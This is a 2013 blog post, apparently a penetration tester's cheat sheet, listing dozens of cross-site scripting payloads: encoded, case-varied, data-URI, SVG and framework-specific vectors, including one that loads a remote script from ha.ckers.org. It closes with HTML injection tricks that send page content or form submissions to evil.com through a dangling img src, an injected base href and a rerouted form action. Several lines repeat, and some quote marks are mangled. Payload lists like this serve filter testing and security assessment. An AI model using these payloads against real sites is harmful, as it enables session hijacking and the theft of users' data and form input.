Wednesday, June 19, 2013

XSS Vectors:
Some from OWASP some from other places...
 
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
 >"><script>alert("XSS")</script>&
<body background="javascript: alert()">"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
<script>alert(1)</script>
‘</title><script>alert(1)<script>‘</title>
<– lorem ipsem–><script>alert(1)<script>–>
<FOO><![CDATA[]]><script>alert(1)</script>]]>
<input type=text name=foo value=a><script>alert(1)<script>>
<input type=text name=foo value=a/><script>alert(1)<script>>
<input type=text name=foo value=”“onevent=?//“>

"><bgsound src="javascript: alert()">"><iframe src="javascript: alert()”></iframe>
</textarea><iframe src="javascript: alert()”></iframe>
</textarea><bgsound src="javascript: alert()">
<script> var foo=”“;alert(1);//“;
<script> var foo=’‘;alert(1);//‘
<sCrIpT>alert('eoin');</ScRiPt>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28 &<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
#<img/src=%22%22onerror=alert(1)>
<img/src=”"onerror=alert(123)>
<a” href” onclick=alert(123)>foo</a>
<a”" href=”"onclick=alert(123)>foo</a>
<img%0a%0dsrc=”"%0a%0donerror=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type=”text” name=”foo” value=”“onmouseover=alert(123)//“>
<input type=’text’ name=’foo’ value=’‘onclick=alert(123)//‘>
<input type=”text” name=”foo” value=”“autofocus/onfocus=alert(123)//“>
<a href=”data:text/html,<script>alert(123)</script>”>foo</a>
<script src=”data:,alert(123)”></script>
<script src=”data:application/x-javascript,alert(123)”></script>
<script src=”data:text/javascript,alert(123)”></script>
<a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg”>foo</a>
<script src=”data:;base64,YWxlcnQoOSk”></script>
<a href=”data:text/html;charset=utf-16, %ff%fe%3cscript%3e alert(9) </script>?>foo</a>
<svg onload=”javascript:alert(123)” xmlns=”http://www.w3.org/2000/svg”></svg>
<svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(123)”></g></svg>
<svg><script xlink:href=data:,alert(123)></script>
<svg xmlns=”http://www.w3.org/2000/svg”><a xmlns:xlink=”http://www.w3.org/1999/xlink” xlink:href=”javascript:alert(123)”><rect width=”1000? height=”1000? fill=”white”/></a></svg>
<script%0a%0dalert(123)</script>
<script%20<!–%20–>alert(123)</script>
<a href=”"&<img&amp;/onclick=alert(123)>foo</a>
<a”"id=a href=”onclick=alert(123)>foo</a>
<a href=”"&amp;/onclick=alert(123)>foo</a>
<script/id=”a”>alert(123)</script>
<img src=”>”onerror=alert(123)>
<img id=”><”class=”><”src=”>”onerror=alert(123)>
<img src=”\”a=”>”onerror=alert(123)>
<a id=’ href=”">’href=javascript:alert(123)>foo</a>
<a id=’href=http://web.site/’onclick=alert(123)>foo</a>
<a href= . ‘”\’ onclick=alert(123) ‘”‘>foo</a>
<img src=”\”‘<a href=’”>”‘onerror=alert(123)>
<a id=’http://web.site/’onclick=alert(123)<!–href=a>foo</a>–>
<img src=”‘”id=’<img src=”">’onerror=alert(123)>
<img src=”<img src=’<img src=.>’>”onerror=alert(123)>
<a href=javascript:alert(123) href href=” href=”">foo</a>
var a = "foo"+alert(123)//";
var a = "foo"&&alert(123)//";
var a = "foo"/alert(123)//";
(function(){alert(123)})()
window["alert"](123)
String.fromCharCode(0×61,0×62)
alert(/foo bar/.source)
window[/alert/.source](123)
angular.bind(self, alert, 123)()
angular.element.apply(alert(123))
Ember.run(null, alert, 123)
_.defer(alert, 123)
<img/src=”"onerror=alert(123)>
<a” href” onclick=alert(123)>foo</a>
<a”" href=”"onclick=alert(123)>foo</a>
<img%0a%0dsrc=”"%0a%0donerror=alert(123)>
<input type=text name=foo value=a%20onchange=alert(123)>
<input type=”text” name=”foo” value=”“onmouseover=alert(123)//“>
<input type=’text’ name=’foo’ value=’‘onclick=alert(123)//‘>
<input type=”text” name=”foo” value=”“autofocus/onfocus=alert(123)//“>
<a href=”data:text/html,<script>alert(123)</script>”>foo</a>
<script src=”data:,alert(123)”></script>
<script src=”data:application/x-javascript,alert(123)”></script>
<script src=”data:text/javascript,alert(123)”></script>
<a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg”>foo</a>
<script src=”data:;base64,YWxlcnQoOSk”></script>
<a href=”data:text/html;charset=utf-16,%ff%fe%3cscript%3ealert(9)</script>?>foo</a>
<svg onload=”javascript:alert(123)” xmlns=”http://www.w3.org/2000/svg”></svg>
<svg xmlns=”http://www.w3.org/2000/svg”><g onload=”javascript:alert(123)”></g></svg>
<svg><script xlink:href=data:,alert(123)></script>
<svg xmlns=”http://www.w3.org/2000/svg”><a xmlns:xlink=”http://www.w3.org/1999/xlink” xlink:href=”javascript:alert(123)”><rect width=”1000? height=”1000? fill=”white”/></a></svg>
<script%0a%0dalert(123)</script>
<script%20<!–%20–>alert(123)</script>
<a href=”"&<img&amp;/onclick=alert(123)>foo</a>
<a”"id=a href=”onclick=alert(123)>foo</a>
<a href=”"&amp;/onclick=alert(123)>foo</a>
<script/id=”a”>alert(123)</script>
<img src=”>”onerror=alert(123)>
<img id=”><”class=”><”src=”>”onerror=alert(123)>
<img src=”\”a=”>”onerror=alert(123)>
<a id=’ href=”">’href=javascript:alert(123)>foo</a>
<a id=’href=http://web.site/’onclick=alert(123)>foo</a>
<a href= . ‘”\’ onclick=alert(123) ‘”‘>foo</a>
<img src=”\”‘<a href=’”>”‘onerror=alert(123)>
<a id=’http://web.site/’onclick=alert(123)<!–href=a>foo</a>–>
<img src=”‘”id=’<img src=”">’onerror=alert(123)>
<img src=”<img src=’<img src=.>’>”onerror=alert(123)>
<a href=javascript:alert(123) href href=” href=”">foo</a>
“+alert(123)//
“&&alert(123)//
“/alert(123)//
/foo bar/.source
/alert/.source
”>, alert(123)<iframe/src=http://xssed.com>alert(123)</scrihttp://pt>alert(123)
”>, ’></div>alert(123)<input><script>alert(123)</script></marquee>alert(123)”>
>”>, </p>alert(123)<marquee><script>alert(123)</script></title>alert(123)
”/>, </ScRiPt>alert(123)<title><script>alert(123)</script></SCRIPT>alert(123)
>”>, </form>alert(123)<b><script>alert(123)</script></input>alert(123)” t type=”hidden” />

 
 
HTML Injection Vectors : (Anti-CSP)
 
Non truncated single Quote:
Steals HTML following injection point until another single quote is encountered.
 
<img src='http://evil.com/log.do?
 
<base> Jumping:
Can be used to reroute forms without absolute paths.
Does not work ion IE (they obey WC3 <head> rule)

<base href='http://evil.com/'> <!-- injected code -->

Form rerouting:
Forms cant be nested. Injection of a form before legit Form reroutes the form to the injected destination

<form action='http://evil.com/log.do> <!-- Injected script -->